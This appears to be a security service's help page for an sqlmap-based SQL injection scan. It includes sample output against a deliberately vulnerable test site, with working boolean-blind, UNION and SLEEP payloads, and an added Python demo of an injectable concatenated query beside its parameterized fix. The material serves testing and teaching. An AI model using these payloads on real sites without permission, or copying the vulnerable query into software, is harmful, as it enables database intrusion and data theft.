SQL Injection Test Help
Using sqlmap, this SQL injection scan attempts to exploit SQL injection in an HTTP GET parameter of the URL you specify.
Entering a web address into the form will have that URL tested for SQL injection by one of our external servers. This type of vulnerability could allow back-end database manipulation, access to customer data or even operating system access.
A URL with parameters at the end is the type of URI tested by this scan:
www.example.com?id=2&page=2
This example URL will have the HTTP GET parameters id and page tested for SQL injection.
Sample Results
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 09:04:35

[09:04:36] [INFO] using '/opt/sqlmap/output/testphp.vulnweb.com/session' as session file
[09:04:36] [INFO] testing connection to the target url
[09:04:37] [INFO] testing if the url is stable, wait a few seconds
[09:04:38] [INFO] url is stable
[09:04:38] [INFO] testing if GET parameter 'artist' is dynamic
[09:04:38] [INFO] confirming that GET parameter 'artist' is dynamic
[09:04:39] [INFO] GET parameter 'artist' is dynamic
[09:04:39] [INFO] heuristic test shows that GET parameter 'artist' might be injectable (possible DBMS: MySQL)
[09:04:39] [INFO] testing sql injection on GET parameter 'artist'
[09:04:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:04:40] [INFO] GET parameter 'artist' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[09:04:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[09:04:41] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:04:41] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:04:52] [INFO] GET parameter 'artist' is 'MySQL > 5.0.11 AND time-based blind' injectable
[09:04:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[09:04:55] [INFO] target url appears to be UNION injectable with 3 columns
[09:04:56] [INFO] GET parameter 'artist' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'artist' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 23 HTTP(s) requests:
---
Place: GET
Parameter: artist
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=2 AND 683=683

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: artist=-743 UNION ALL SELECT NULL, CONCAT(CHAR(58,105,117,110,58),IFNULL(CAST(CHAR(67,106,71,66,118,97,119,68,106,119) AS CHAR),CHAR(32)),CHAR(58,100,107,122,58)), NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: artist=2 AND SLEEP(5)
---

[09:05:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0.11
[09:05:16] [INFO] Fetched data logged to text files under '/opt/sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 09:05:16
Online SQL injection scan to test for injectable parameters on a web URI; testing methods include blind and error-based SQL injection.
Note that you must have permission to scan the site you nominate. Automated security scans may upset listening services, fill up log files and trigger IDS alerts.
Enter the URL to test and your email address; results are delivered by email.
Start SQL Injection Test Scan
Access to this scan is restricted.
Membership is required to use this security scan. Immediate access is available to new members, or log in now if you have a valid membership. This restriction has recently been added; see this blog post for full details of the changes.
About SQL Injection
SQL injection is a common attack vector in dynamic web applications. It allows an attacker to gain access to the database or database functions through poor coding methodology. A good SQL injection reference is over at the OWASP site.
Recently there have been a number of high-profile attacks carried out through SQL injection; these have resulted in the loss of millions of customer records and hundreds of thousands of login/password combinations.
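The boolean-based blind check in the sample results above works because the application pastes the `artist` value straight into its SQL. The following added example (not part of this page or of sqlmap) reproduces that coding flaw and its fix in Python with an in-memory SQLite table standing in for the MySQL back end; the table, its rows and the function names are constructed for illustration.

```python
import sqlite3

# Constructed stand-in for the scanned application's database: the HTTP GET
# parameter `artist` is meant to select one row by numeric id.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE artists (artist_id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO artists VALUES (?, ?)",
                     [(1, "Alice"), (2, "Bob"), (3, "Carol")])
    return conn

def lookup_vulnerable(conn, artist_param):
    # The "poor coding methodology" the page refers to: the raw GET value is
    # concatenated into the SQL text, so it is parsed as SQL, not as data.
    sql = "SELECT name FROM artists WHERE artist_id = " + artist_param
    return [row[0] for row in conn.execute(sql)]

def lookup_parameterized(conn, artist_param):
    # The fix: the value is bound as a parameter. SQLite applies the column's
    # numeric affinity to a plain "2" but a string with SQL in it never matches.
    sql = "SELECT name FROM artists WHERE artist_id = ?"
    return [row[0] for row in conn.execute(sql, (artist_param,))]

def boolean_blind_differs(lookup, conn, base="2"):
    # sqlmap's boolean-based blind test from the sample output: a true
    # condition (683=683) must leave the original response unchanged while a
    # false one (683=684) must change it. True means the lookup is injectable.
    base_rows = lookup(conn, base)
    true_rows = lookup(conn, base + " AND 683=683")
    false_rows = lookup(conn, base + " AND 683=684")
    return true_rows == base_rows and false_rows != true_rows

if __name__ == "__main__":
    db = make_db()
    print("concatenated query injectable:", boolean_blind_differs(lookup_vulnerable, db))
    print("parameterized query injectable:", boolean_blind_differs(lookup_parameterized, db))
```

The same true/false pair is what a web server log shows as two requests differing only in the trailing condition, which is a useful pattern to alert on.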